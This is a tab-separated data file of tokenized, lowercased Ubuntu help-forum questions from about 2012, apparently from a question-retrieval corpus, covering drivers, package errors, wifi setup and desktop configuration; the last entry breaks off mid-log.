230144	gfortran in ubuntu 12.10	i hope my message will get read soon and somebody will give me a solution . i use fortran to do simulation and gfortran is the compiler i use . recently i migrated from ubuntu 10.10 to 12.10 . after installing gfortran then i tried to compile and run my fortran programs then the problem started . i successfully compiled the program but i am unable to execute it . ( i work in a directory in shared partition , not in home directory ) . when i compiled the program and run it within home directory , everything worked fine . on my ubuntu 10.10 , i was able to compile and execute fortran program from everywhere not only within home directory . this is what i do for compiling and executing fortran program : gfortran hello.f90 -o hello # to compile it ./hello # to execute it i 'm blind about path or anything like it ( this has to do with it , i suspect ) so please give me direction .
230145	i 've stuffed my banshee config , now it wo n't start	not sure what i 've done , but when i click the banshee icon in the menu , the starting banshee button appears for a few seconds in the taskbar at the bottom , then disappears . i 'm running 10.04 lucid by the way . if i try to start it using the command line , i just get a blinking cursor . i can start it as root , but it advises me to move my music to root 's home directory , but i do n't want to run it as root anyway . i 've tried re-installing , upgrading to a newer version , reverting back to an older version etc , all to no avail . i 've tried deleting all the config files etc , but nothing works . if i log in as another user it works , so i know it 's something in the config , but i just ca n't work out what . can anybody help ? thanks in advance
230151	how to install i386 packages on ubuntu on arm-based nexus 7 ?	i have installed ubuntu on a nexus 7 ( with an arm processor ) . i want to install a deb package made for i386 architecture . is that possible ? how should i proceed ?
230152	asus n56vz brightness setting changes ( dims ) after reboot or waking	i normally have the brightness set to max or near max ( at least 80 % ) , but each time i reboot or wake from sleep , the display brightness resets to minimum . there are other similar questions here , but the proposed solutions all refer to files in acpi_video0/ which i do not have . the only thing in my /sys/class/backlight directly is a shortcut to an intel_backlight directory with an absurdly long path name . from the files within this directory , i gather that the brightness level ranges from 0 to 4882 ( so nothing close to what i 've seen posted in other questions , where the max is 8 or 10 ) .
230161	how do i recompile the kernel ?	i read from wireless developers that i have to run make menuconfig command to change some configuration of the wireless driver ( enable/disable something ) . after changing , do i have to recompile the kernel to give effect to changes ? if i have to , how to compile ?
230162	how to install i386 library ?	how to install or upgrade library i386 in ubuntu server . as shown below for one server it showing i386 and for other version it is only showing i686 only uname -a linux ubuntu 3.0.0-12-generic-pae # 20-ubuntu smp fri oct 7 16:37:17 utc 2011 i686 i686 i386 gnu/linux lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 uname -a linux ubuntu 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:32:08 utc 2012 i686 i686 i686 gnu/linux lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal please help me with this ... .
230164	less/pager does not trap keys , how do i work around it ?	i have ubuntu 12.10 installation in virtualbox . sometimes anything using pager ( less , man ) just acts funny and seem to fail to `` trap '' keys , ie . scrolling , searching etc does not work . instead control keys are just printed ^c^w etc . even ctrl-c , ctrl-d etc do not work and only way to escape is ctrl-z . i never do anything special to break it and it also seems to fix itself after time . rebooting usually does not fix the issue , but for example , it has fixed itself after idling over night . that makes no sense : - ) how to fix permanently or how to workaround/reset it ? same issue occurred on a windows putty ssh connection to opensuse server . it is therefore not related to virtualbox nor strictly limited to ubuntu .
230168	how to make franklin u600 usb modem work ?	usb-devices shows : t : bus=02 lev=03 prnt=08 port=01 cnt=01 dev # = 10 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1fac prodid=0150 rev=00.00 s : manufacturer=franklin wireless corp. s : product=usb micro sd storage s : serialnumber=220671445300 c : # ifs= 1 cfg # = 1 atr=c0 mxpwr=100ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage lsusb shows : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 2232:1020 bus 002 device 003 : id 8086:0189 intel corp . bus 002 device 008 : id 1a40:0101 terminus technology inc. 4-port hub bus 002 device 009 : id 0425:0001 motorola semiconductors hk , ltd bus 002 device 010 : id 1fac:0150 so , my ubuntu does n't want to see usb modem as modem , and i am having trouble with it .
230172	ic 703 and mirage a1015	trying to find ways to connect via phono jack ic 703 and mirage a1015 6m . older versions of linear.i do not know which wires to connect and be given something to work on linear ?
230180	libre office copy formatting ctrl+shift+c alternative	microsoft word has a very useful command for copying and pasting formatting . ctrl+shift+c and ctrol+shift+v is there such a command available in libre office writer ? if not , is there some way of adding it ?
230182	losing wifi on 12.04 , no way to get it back ?	i am running 12.04 on an asus eeepc 1201n . regularly , wifi connection is lost and there seems to be no way to get it back without a reboot . the same machine booted on win7 never fails . i am at a loss , any ideas ? output from lspci : 07:00.0 network controller : realtek semiconductor co. , ltd. rtl8191seva wireless lan controller ( rev 10 ) 09:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 )
230185	sony vaio vgn-cs118e touch sensor a/v does n't work on ubuntu 12.10	i have been using ubuntu on my vaio labtop for quit a while now , but i could n't figure out how to get these touch sensors to work as they do on windows . can anyone help me with this .
230191	problem running virtual machines on ubuntu 12.04 via virtualbox	i installed ubuntu 12.04 last week . now i want to use windows 7 on ubuntu via virtualbox . i installed the virtualbox and created a new machine namely 'windows 7 ' . i 'm booting through an iso image . when i start the virtual machine it does not run . it gives the following 2 errors : '' failed to open a session for the virtual machine mint . the virtual machine 'mint ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } '' . and the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . '' i have no idea that how to fix it . i tried running other os as well like linux mint 12 but same error occurs . please help ! ! ! !
230195	how to enable password for administrator account so i am prompted when i log in ?	i am new with ubuntu , and though i am liking it a lot i am making the typical mistakes ( for what i have seen on the forum : - ) ) i took off the password for the admin account , not knowing that this would cost me being on the computer for a few hours figuring out how to put it back on ( done ) . however , i am no longer prompted to enter the password when i first log into the system , which i want to amend . does anyone know how to amend this from the terminal ? thanks to all alex
230200	no updates found after apt-get update	i think i have a problem . i 'm using ubuntu 11.04 and i do n't receive any new updates since 19 november when i done autoremove command . i do n't believe that there are no updates .
230203	how to install kghostview	in order to use kghostview , i download the page from here . after that , i run the following command : sudo dpkg -i kghostview_3.5.10-0ubuntu1~hardy1.1_i386.deb however , i have the following error messages : dpkg : dependency problems prevent configuration of kghostview : kghostview depends on gs ; however : package gs is not installed . kghostview depends on kdelibs4c2a ( > = 4:3.5.8-1 ) ; however : package kdelibs4c2a is not installed . kghostview depends on libqt3-mt ( > = 3:3.3.8-b ) ; however : package libqt3-mt is not installed . dpkg : error processing kghostview ( -- install ) : dependency problems - leaving unconfigured it seems that i should also install some external packages such as gs , kdelibs4c2a and libqt3-mt . however , i do not have any idea of how to install them . i try the sudo apt-get install command , but fail . any idea will be appreciated .
230207	how to install glibc-devel in ubuntu-12.04 ?	when i run the following command : sudo apt-get install glibc-devel i get the following error : e : unable to locate package glibc-devel how do i resolve this issue ?
230208	how to `` reverse-backport '' a package available on earlier ubuntu distribution to later distribution ?	there are 4 packages i am using on 12.04 which are not available on 12.10 : xkcd-browser ; - ) cuttlefish bluphone xserver-xorg-input-synaptics ( it allows for touchpad rotation that could go along screen rotation with randr ) is there any way of more-or-less automatic reverse-backporting ? ( i know , that one `` solution '' is to wait . but unless i know for how long i should do it , it does n't solve anything . ) update : the process involving the packportpackage illustrated below on example `` xkcd-browser '' does n't work for none of the 4 packages ; however the error report seems to be different for each item . backportpackage -b -d quantal -w . http : //ppa.launchpad.net/brianrobles204/xkcd-browser/ubuntu/pool/main/x/xkcd-browser/xkcd-browser_12.08.4.dsc
230211	can you make calls with ubuntu on a nexus 7 ?	i 'm considering buying the nexus 7 and installing ubuntu on it , and if it can make calls it will be even better .
230213	full disk encryption	i have a ubuntu distribution ( 12.10 ) in my laptop , but i did n't encrypt my hard disk in the installation phase . it 's possible that i could encrypt my hard disk without install everything again ? and without loosing my files and programs already installed e configured ? thanks in advance .
230215	execure a random command from .txt file ?	i have a ubuntu server , and i 'm trying to print a twitter quote using the app `` twidge '' . so i made a list of tweets on a .txt file . i want to print one tweet ( per line ) from that file and send it to twitter via twidge ( or what ever other method was possible ) . i can print a random phrase with shuf : shuf -n 1 /var/www/tweets.txt and it works . it sends me back one of the tweets , but , it does not send it to twitter , even if the `` in line '' phrase is a command . i.e : twidge update `` bla bla bla '' it just prints on the screen , but do n't send it to twitter . i tried turning the .txt to .sh , but do n't work ... any idea ? by the way , i want to use it with crontab , something like this : 15 * * * * shuf -n 1 /var/www/tweets.txt
230216	how can i play amr files in firefox on ubuntu ?	i use evernote to keep voice and text notes . unfortunately , i 've just discovered that i ca n't take full advantage of the cloud storage capabilities of evernote , because the amr files wo n't play in firefox ( or chrome ) . this problem is discussed in the evernote forums , though the information there is a little out of date . at first i was getting a `` missing plugin '' error . however , since then i have installed the medibuntu repository , vlc player , and libopencore-amrnb0 version 0.1.3-2 . now , when i open an evernote audio note in firefox , i see this interface : while the plugin image seems promising , sadly , when i hit the play button ( or right click and select `` play '' ) , nothing happens . i have also now discovered that if i download the amr file to my computer , and open it with vlc , it plays . it also plays in totem and mplayer . so the problem seems to be specific to playing amr files within the browser . why would playing an amr file using the vlc plugin in a browser be different from using the stand alone player ? more importantly , how can i get ubuntu to play amr file directly in firefox in ubuntu ?
230224	ubuntu freeze when i plugged the power cable	i recently update the system ( 12.10 ) on my laptop and after that whenever i plug the power cable in to my laptop it freezes and has no function of the mouse or the keyboard . i have to reboot the laptop and after that it 's fully functional . ( with the power cable plugged in . ) i need help to troubleshoot this problem or to report it as a bug if that is required .
230225	why qbittorrent shuts down lightdm ?	immediately after i run qbittorrent application it opens up and right after it 's loaded i 'm suddenly at login screen . tried reinstalling , uninstalling installing but did n't help ...
230226	problems booting because the hdd is full . how can i get stuff off my hard drive ?	i have used up all the space on my hard drive and when starting up the computer says the only option i have is to start up in basic graphics mode . on the screen it then says stopping system v runlevel compatibility . i have looked at the answer provided on here , it will let me type but then nothing else . i tried the ctrl+alt+f1 combination , but nothing happens . i have some stuff on the hard drive can i get that off ? i am at a loss ! ! ! ! !
230228	how to change windows without going full circle ?	i 'm used to [ alt ] + [ tab ] to change windows and i 've installed compiz config settings manager ( ccsm ) to tweak the default behaviour to my likings . i 've noticed that , after pressing [ alt ] + [ tab ] , you can only go forward ( press [ tab ] again ) . you can not go backward ( pressing [ shift ] + [ tab ] , maintaining [ alt ] ) . this means that , when you pass the window you want to use , you have to go full circle . is there a way to tweak the switcher to do that ? i believe that this was how it used to work in 11.10 .
230232	dell inspiron 15r [ special edition ] fan speed problem	i have a dell inspiron 15r se ( click here for details ) . i have installed ubuntu 12.10 via wubi on it . the os works perfectly fine , but there are some issues : the fan speed is so high that it is actually audible . this does n't happens when working with windows 7 . the laptop gets somewhat hot . again , not an issue with windows 7 . instead of showing me the name of my ati graphics card , it shows `` standard '' or `` generic '' display drivers . ( pardon me , i can not recall the exact name . ) the battery drains twice as fast as it does on windows 7 . other than the problems i have mentioned above , it works really good . no issue on software side at all .
230233	brother 's scanner is not working on ubuntu 12.10 32-bits	i have a brother dcp j125 i have downloaded and installed the scanner driver but simple scan shows that it could n't detect any scanner . i 'm running on ubuntu 12.10 32bits , the steps show in the brother faq do not work for me as i ca n't find the lib64 folder . can anyone help me ?
230234	sync ubuntu and phone	can you sync ubuntu and android phone , without having to install ubuntu on phone , even if i have to how much space will it take ?
230238	the root.disk file is empty ( 0 kb )	i 've a problem when starting ubuntu..its showing like this : minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > i 've installed ubuntu on windows platform with wubi ... i checked the root.disk file in /ubuntu/disks/ it is 0kb in size . i 'm wondering whether my data is lost . is there any way to recover it ?
230240	music player / database for read-only music collection	i am looking for a music player and/or database for using with a read only music library . the situation is this : i have a music library ( flacs , oggs , mp3s ) that i , for diverse reasons , want to keep read-only and not change at all ( apart from adding more files ... ) . a few of the files are not tagged at all and some files are badly tagged . features i look for a music player with an external âtagâ database . that is , the tags are saved separate from the audio files and override information found in the audio files . the database should be initialized form the tags in the files , but subsequent edits should ( as per the previous point ) be visible in the program , but not written to the audio files . the program should never even attempt to write to the audio files . import/export function for tag data would be appreciated . situation : the audio files are on a network drive and i want to synchronize the database between the computers that mount the net-drive . convert-feature would also be appreciated . where a selected subset of the audio files would be re-encoded ( for example , into low-bitrate ogg vorbis for use on my phone ) and would be put outside the collection and automatically be tagged with the information in the database . also , searching or playing by artist/genre/year/ ... is not a required feature . ( see next point ) i use playlists ; so managing playlists and adding from the present folder structure is a wanted feature . so , is there any program fulfilling ( most of ) these points ? or , could someone point me towards a solution for this situation ? i am not too averse to some scripting and such ...
230241	why am i missing the ubuntu icon on the log-in screen ?	i am running ubuntu 12.10 . on the log-in screen , there is no ubuntu icon for me to click on to change desktop environments . i know where it should be , but it is simply not there . why is this ? and how can i get it back ? ? ? i just installed cinnamon and i would very much like to switch to this environment . i apologize if this is has been addressed elsewhere , but i honestly did try to research before asking . i found several similar questions , but nothing that has answers that helped my situation . and an hour of googling did not produce anything helpful at all . thank you for your help .
230242	how integrate manually installed app into the desktop ?	by manually installed , i mean downloaded as a .bz2 file and extracted into my home directory . what should i do so that it 's available from the dash and so i wo n't have to go to the directory and click the bin file ? please no .desktop file creation , i 'd only want it to be available from the dash and via open with menu .
230243	is it possible to have dual monitors using a virtual terminal ?	i 'm a bit of a command line nuthead . i have a computer with dual monitors . its setup works just fine in x11 - dual monitors , where my desktop stretches all the way across . however , what i would like is to replicate that behavior when i 'm using the virtual terminal . right now , it simply mirrors the output . is there any way to have my resolution streeeeetch all the way across both monitors ? e.g . instead of 80x24 , i 'd have 160x24 ?
230250	how to migrate to kde ?	in the next few weeks i 'm going to be seriously trying kde . i 've noticed that i 'm slowly ripping more and more out of the default ubuntu system so i can stick with one panel on the bottom of the screen ( win95-style ) so it seems to make sense to move to a kde than stay with the sinking , unmaintained ship that is gnome-panel . i 'll be testing in a persisting live usb environment but assuming i like kde , i 'll want to migrate my existing install . a fresh kubuntu install would take me too long to re-set-up all my server stuff . so , what 's the best way to install a proper kde environment and then clean out the gnome environment ? in the past , i 've installed kubuntu-desktop to play with but this has trashed both environments with extra applications and dodgy file associations . in a slightly separate vein , is it possible to have gnome and kde installed on the same instance of ubuntu without them trashing each other with their own applications ?
230251	how to sort banshee by track order ?	i have several playlists containing only one artist , but multiple albums by that artist . i would like to sort these playlists so that the albums are grouped together and ordered by track number . for some reason , clicking on the columns does not sort them . it 's like the column headers are static and ca n't be clicked . i think manual sorting is turned on , but i do n't know how to turn it off . i know there are other players , but i really love the integration with unity , and do n't want to give it up .
230260	kernel 3.7 switching to clocksource tsc freeze on startup	i ca n't start my ubuntu 12.10 with kernel 3.7 , it freezes on a black screen . when i choose advanced options and select the newest kernel it shows some lines and the last of them is `` switching to clocksource tsc '' my system is a amd athlon ii x4 630 with a nvidia video board . it works fine with kernel 3.5
230263	how to install clpqr library in swi-prolog	i am using ubuntu 12.10 and going to write prolog program with clpqr . i write this in first line : : - use_module ( library ( clpr ) ) . i got this message : source_sink `library ( clpr ) ' does not exist so , how to install that library ? i 've found some bug report about this , but maybe there 's another way to install it ...
230268	grub no such partition recovery - all i have is the ubuntu install media and i didnt remove ubuntu	the title speaks for itself , now all i have is the ubuntu live cd and no windows recovery media . i didnt remove the ubuntu partition but i was clearing out my windows pc and i delete other partitions ( may have a role in this error ) . so i am now wondering if i boot from the live cd , how will i be able to resolve this error and boot into windows ? this is urgent , please help .
230269	installing ubuntu on blank hard drive	ok so i took the hard drive out of my old laptop to use as an external however now i want to use it in the old laptop again so that i can mess with linux . again , i did reformat it to the `` default settings '' which was fat . i have installed ubuntu on a flash drive the way that the website has says however when i put it in and restart my computer it says `` please remove all disks and restart computer '' . how can i solve this problem and install ubuntu properly ? comp specs : sony vaio i3 processor 4 gb of ram 500gb hd
230270	immediately after login , my 12.04 lts desktop asks for my password for `` authentication is required to change user data ''	i have two ubuntu 12.04 systems , one a desktop , and the other running as a nis/nfs server ( a desktop with lightdm disabled ) . when i login , i get the dialog ( not error ) `` authentication is required to change user data '' the details section of the dialog says `` org.freedesktop.accounts.user-administration '' any help helping me figure out how to make this dialog go away is appreciated . btw , not entering the password has no effect whatsoever .
230274	how to run mts mblaze in ubuntu 10.04 lts	i connected the mts mblaze usb in a pc that runs ubuntu 10.04 lts . i found the icon of mblaze on the screen ( setup.exe ) , i double-clicked it , but it did n't execute because there was an error . i have to install the g++ compiler package . thanks in advance .
230275	ubuntu 12.10 `` fakeraid '' raid0 installation	i have 2 80 gb hdd 's with a raid 0 motherboard configuration ( intel z77 , fakeraid ) with a 100 gb partition running windows 7 and a 60 gb partition where i would like to install ubuntu 12.10 . however , even though the installer seems to correctly detect the raid 0 array , grub2 is not installed and the computer boots into windows normally . the same thing does not happen when installing fedora 17 . the installer ( anaconda ) also detects the disk array , but grub2 installation is successful . what exactly are the differences between ubiquity and anaconda ? and is there a way to correctly install grub2 in a fakeraid system , since there are no alternative ubuntu cds ?
230276	xfce - stop active window moving when switching workspace	i 've just switched from gnome to xfce , and i 'd like to know how to stop the active window moving when i change workspace . e.g . i have my internet browser selected then change to another workspace , the workspace will change but the internet browser will also move to that new workspace . is this supposed to happen ? is there a setting somewhere i can use to stop it ?
230282	restricting access to yahoo.com with squid and elinks	i need to restrict the access to yahoo.com and fr.yahoo.com in elinks using squid . can everyoane help me
230284	i am unable to solve this error in my ubuntu 12.04 '/var/lib/dpkg/status ' near line 1050 package 'swish++ '	when i tried to update my system and installing new program . it failed because of following error . i tried to remove swish++ , but that also failed . so currently i am not able to update/upgrade/install/uninstall/remove any packages from my system . i have tried f- install but that is also not working . kindly guide to solve this problem . `depends ' field , reference to `libc6 ' : implicit exact match on version number , suggest using `= ' instead dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 1050 package 'swish++ ' : `depends ' field , reference to `libc6 ' : version value starts with non-alphanumeric , suggest adding a space dpkg : error : parsing file '/var/lib/dpkg/status ' near line 1050 package 'swish++ ' : `depends ' field , reference to `libc6 ' : version contains ` ' e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 1050 package 'swish++ ' : `depends ' field , reference to `libc6 ' : implicit exact match on version number , suggest using `= ' instead dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 1050 package 'swish++ ' : `depends ' field , reference to `libc6 ' : version value starts with non-alphanumeric , suggest adding a space dpkg : error : parsing file '/var/lib/dpkg/status ' near line 1050 package 'swish++ ' : `depends ' field , reference to `libc6 ' : version contains ` ' requested output from comment : arif @ arif-desktop : ~ $ head -n 1050 /var/lib/dpkg/status | tail -n 1 depends : libc6 ( .= 2.7 ) , libstdc++6 ( > = 4.6 ) , zlib1g ( > = 1:1.1.4 ) , perl5
230285	stable ubuntu distribution for a broadcom bcm4313 wireless driver and an nvidia 630 graphics adapter	i have been trying to completely shift to ubuntu or a linux distro for almost 2 years now . i have tried all the ubuntu distros starting from 10.04 through 11.10 , but there has always been some bugs with the display drivers or the wireless cards not being recognised and the additional drivers suggested from the ubuntu community not doing the trick always . i tried a lot to fix bugs , checked a lot of forums , launch pad , got some of them fixed , but could not really get a neat and complete ubuntu machine set up till now . now i really like the whole open source community and the linux platform , my pc at home runs ubuntu 11.04 perfectly but there have been some glitches always with ubuntu on my laptop that has forced me to stick with windows only . now i am currently on an hp dv6 laptop that has the broadcom bcm4313 wireless driver and the nvidia 630gtm graphics ( optimus ) driver . now i tried to do some research on the support of these drivers in linux machines but could not get anywhere . so i would really appreciate if you guys could suggest some linux distro that i could use that has full support of these drivers or has stable bug fixes for these kind of issues . i tried precise pangolin ( lts ) through a live cd but i still see a problem with wifi networks which is a little frustrating . please help me find the perfect match for my laptop : p i would gladly provide any other information necessary .
230286	how do i turn off the keyring in ubuntu ?	it constantly pops up when i visit certain websites ( and even sometimes while i am trying to write the address for another website ) . i am relatively new to ubuntu/linux and using ubuntu 12.04 . the `` possible duplicate '' above gives an answer that i can not use , because it raises privacy issues . i just want to turn this keyring off . i tried removing all the remembered passwords in `` passwords and keys '' , as suggested here but this did not help .
230289	upgrade to windows 8 on ubuntu 12.04 lts	windows are now selling versions of windows for âł25.00 . i want to update and get rid of ubuntu . how do i do this ? and will it be comptable for ubuntu ? i hope so . pls help . ( oh , and i am using an e-system 1201 laptop that is running ubuntu 12.04 lts . it also has a brokencount > 0 ' error . i hope that error does not affect the system upgrading . )
230293	how to configure eth1	i need to set up eth1 using these : ip 10.5.15.200 netmast 255.255.255.128 mac address aa:6f:78 : ui:34:34 and must be set up before eth1 starts and default gateway must be the first usable address from network
230296	sharing folders between ubuntu ( guest ) and windows 7 ( host ) using virtualbox	i installed ubuntu guest on a windows 7 machine using virtualbox . how can share folders between ubuntu guest and windows host ? thanks .
230297	offline installation of video plugins	please help i installed ubuntu11.10 32bit in an ibmtp41 notebook , that is not connected to the internet , tried running video files such as .mp4 , .flv , .avi , .xvid , in movie player but it asks for plugins , see the list below mp4 : mpeg-4 aac decoder ; h.264 decoder flv : sorensonspark video decoder ; mpeg-1 layer3 ( mp3 ) decoder avi : mpeg-1 layer3 ( mp3 ) decoder ; mpeg video decoder xvid : ac-3 ( atsc a/52 ) decoder ; xvid mpeg-4 decoder how do i donwload ( from another computer with internet ) and install all these plugins and their dependencies . i also want to install the vlc media player and its dependencies i assume this is related to the restricted codecs and i have tried donwnload/install them with no success . i 'll appreciate all ur help
230300	incorrect work gnome terminal	i use at work ubuntu desktop 12.04 . 80 % of the time i spend in the terminal . after switching from the putty on gnome terminal , i was unpleasantly surprised to work with some devices ( eg extereme summit x650 ) : gnome terminal : # module lldp configuration . press < space > to continue or < q > to quit : after press space : # module lldp configuration . press < space > to continue or < q > to quit : [ 60 ; d # # # module msdp configuration . # putty ( windows and linux ) /konsole # module lldp configuration . press < space > to continue or < q > to quit : after press space : # module lldp configuration . # # # module msdp configuration . # how to fix the gnome terminal ?
230304	ubuntu 12.10 desktop/interface not showing on virtualbox vm after login screen	i 'm having some trouble with getting my ubuntu to work on a virtualbox vm . i made a clean installation of ubuntu 12.10 on a vm without any errors . i arrive at the login screen , as soon as i press enter it does it 's little loading thingy and then screen goes black , then this is all i get : i can access the terminal and pretty much all the other features through it , but i would like to have the gui properly working . i 've been looking around the web and looking at various fixes to similar problems , but ca n't seem to get it to work . i 'm thinking this problem might have to do with the graphics ? i 'm running windows 8 pro as host , if that helps , might be some compatibility issues with virtualbox in w8 ... thanks in advance !
230307	how to log the activity of a network interface in a file	i need to write a `` one-liner '' in /etc/network/interfaces that ensures that when eth1 goes up/down a file /var/log/network.log is written with something like that up/down [ date/time ] ex : up [ 10-12-2012/21:30:00 ] the format is [ dd-mm-yy/hh-mm-ss ] if eth1 is active put in /var/log/network.log up [ date/time ] if eth1 is down put in /var/log/network.log down [ date/time ]
230309	aptana studio 3 does not start up due to `` syntax error : `` ( `` unexpected aptana ''	i followed the instructions provided here to install aptana studio 3 in my ubuntu 12.10 . i have completed all the steps with out any problems . when i click the aptana icon in my unity bar nothing happens . no error pops up ! i gave permission on the sh file and on the directory ( /opt/aptana_studio_3 ) but still same problem . if i try executing the sh file in the /opt/aptana_studio_3 folder , it says `` syntax error : `` ( `` unexpected aptana '' . also i can not execute the aptana binary file directly . i have been trying to solve the problem for a while now . any help would be much appreciated . edit : i have oracle java 7 installed . i have read some post about backwards compatibility problem with java 6 but dont know whether that 's the issue . i will edit the question if i find something new .
230311	free software for billing ( colombia )	english i 'm looking for a billing application ( also inventories , shopping , clients , providers , accounts , etc ) for small businesses . the software should adapt with colombia 's necessities . i searched for it in google , and i found several erp such as openbravo and adempiere , but these applications are very big and difficult to use , in fact , i could n't make them work . i found an application called ubifactura ( made specifically for colombia ) , i downloaded the java source code , but i do n't have any idea about how to compile it . i need someone to help me to compile it or just some recommendations for similar software . the idea is to help small business from my town with one of these applications ( it does n't matter if it is for windows or linux ) , the idea is to help . all help is welcome . spanish ( espa単ol ) estoy buscando una aplicacion de facturacion ( tambien inventario , compras , clientes , proveedores , cuentas , etc ) para peque単as empresas , que se adaptade a las necesidades de colombia , en google encontre varios erp como openbravo y adempiere , pero aplicaciones muy grandes y dificiles de manejas , de hecho no puede hacerlas funcionar . encontre un programa llamado ubifactura , hecho para facturar en colomabia , descarge los archivos de codigo fuente en java , pero no tengo ni idea de como ponerlo a funcionar , pues habla de eclipce , de un servsdor cvs , que no tengo ni idea de como poner a funcionar , necesito si alguien me puede ayudar a trabajar con estos archivos java , o me suguieran aplicacion de acuerdo a mis necesidades . la idea es bebeficiar a varias peque単as empresas de mi pueblo con una aplicacion de estas , ni importa si en entorno windows o ubuntu , la idea es aportarles algo desde el software libre . saludos y a la espera de respuestas . toda ayuda es bienvenida .
230313	apache 2 configuration port and root directory	can everyone tell me how to make apache2 to listen only on port 8080 and how to make root directory /home/alex/www
230316	noise suppression in mic	i 'm just a new ubuntu user . and i have the following question or maybe idea for future implementation . so here is a feature that i have in windows that makes my skype calls much easier . so what i 'm asking is if a comparable feature like this on the picture exists . thanks in advance
230319	how can i hide or show a different ip to a website ?	i 'd like to watch bbc iplayer ... but it only works in the uk . i am currently living in spain . is there a way to hide my id and make the bbc website believe that i have a uk ip or something ?
230322	wifi for ubuntu 12.04.1 on beaglebone	i have a beaglebone running ubuntu 12.04.1 lts with a realtek wifi usb dongle : ubuntu @ arm : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i am able to connect just fine to my netgear r6300 with the following /etc/network/interfaces file : auto lo iface lo inet loopback # wifi example auto wlan1 iface wlan1 inet dhcp wpa-ssid `` falkorsystems '' wpa-psk `` < omitted > '' however i am trying to connect to my verizon mifi device `` jetpack 4260l '' , and i 'm not having any luck . i 'm able to connect fine to the mifi from my mac . the mifi is setup with wpa2 , just like the netgear r6300 auto lo iface lo inet loopback # wifi example auto wlan1 iface wlan1 inet dhcp wpa-ssid `` falkormifi '' wpa-psk `` < omitted > '' i 've also tried configuring the mifi with an open network and i used : auto lo iface lo inet loopback # wifi example auto wlan1 iface wlan1 inet dhcp wireless-ssid `` falkormifi '' i 've also created an access point on my mac using the instructions here : http : //www.dummies.com/how-to/content/how-to-make-your-mac-a-wifi-access-point.html and i created it without any encryption , and i was n't able to connect . i would do : > ifdown wlan1 > ifup wlan1 and the ifup command would hang . i also tried rebooting rather than doing ifdown/ifup . dmesg would tell me , when it connects successfully to my netgear : [ 22.805207 ] cfg80211 : calling crda to update world regulatory domain [ 25.983702 ] rtl8192cu : mac address : 00 : e0:4c:09:25:15 [ 25.983752 ] rtl8192cu : board type 0 [ 26.241514 ] rtlwifi : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 [ 26.241561 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 26.241589 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241608 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 26.241630 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241647 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 26.241669 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241686 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 26.241707 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241725 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 26.241746 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241764 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 26.241785 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241802 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 26.241824 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241841 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 26.241863 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241880 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 26.241901 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241919 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 26.241940 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241957 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 26.241979 ] cfg80211 : 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 26.241996 ] cfg80211 : disabling 